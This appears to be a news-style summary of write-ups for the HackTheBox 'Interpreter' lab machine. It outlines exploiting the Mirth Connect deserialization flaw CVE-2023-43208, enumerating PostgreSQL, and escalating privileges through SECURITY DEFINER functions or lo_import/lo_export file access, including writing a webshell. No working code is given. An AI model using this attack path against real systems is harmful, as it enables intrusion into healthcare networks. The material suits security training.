Write-ups Emerge for HackTheBox 'Interpreter'
Multiple users have successfully compromised the medium-difficulty "Interpreter" machine on the HackTheBox platform. Published write-ups detail an attack path that involves exploiting a vulnerable Mirth Connect instance and performing deep PostgreSQL enumeration. The challenge requires chained attacks and creative pivoting to achieve privilege escalation.
- The initial exploit likely targets CVE-2023-43208, a critical unauthenticated remote code execution vulnerability in Mirth Connect with a CVSS score of 9.8. This vulnerability stems from an incomplete patch for a previous issue (CVE-2023-37679) and allows attackers to execute arbitrary code without needing any credentials. - The vulnerability in Mirth Connect is due to the insecure use of the XStream library for deserializing XML payloads, which can be triggered by a specially crafted HTTP request. Exploitation is considered straightforward, and public proof-of-concept exploits are available. - Mirth Connect is a widely used open-source data integration platform in the healthcare industry, making its vulnerabilities particularly high-impact. A compromised Mirth Connect server, which often runs with high privileges like SYSTEM on Windows, can serve as a pivot point into a healthcare network. - After gaining initial access, penetration testers would typically perform enumeration of the internal network and services. On the "Interpreter" machine, this leads to the discovery of a PostgreSQL database instance. - PostgreSQL enumeration involves identifying databases, schemas, tables, and user roles to find sensitive data or potential privilege escalation paths. Tools like `psql` and scripts from frameworks such as Metasploit can be used to connect to the database and probe for weaknesses. - A common PostgreSQL privilege escalation technique involves exploiting misconfigured user permissions or functions. For instance, if a low-privileged user can execute functions with the privileges of a superuser (a `SECURITY DEFINER` function), they may be able to gain full control of the database. - Another vector for privilege escalation in PostgreSQL can be the ability to read or write to arbitrary files on the underlying operating system through specific functions like `lo_import` and `lo_export`. This could allow an attacker to read sensitive configuration files or write a webshell to gain further access. - The Cybersecurity and Infrastructure Security Agency (CISA) added CVE-2023-43208 to its Known Exploited Vulnerabilities (KEV) catalog in May 2024, indicating active exploitation in the wild by threat actors, including state-sponsored groups.
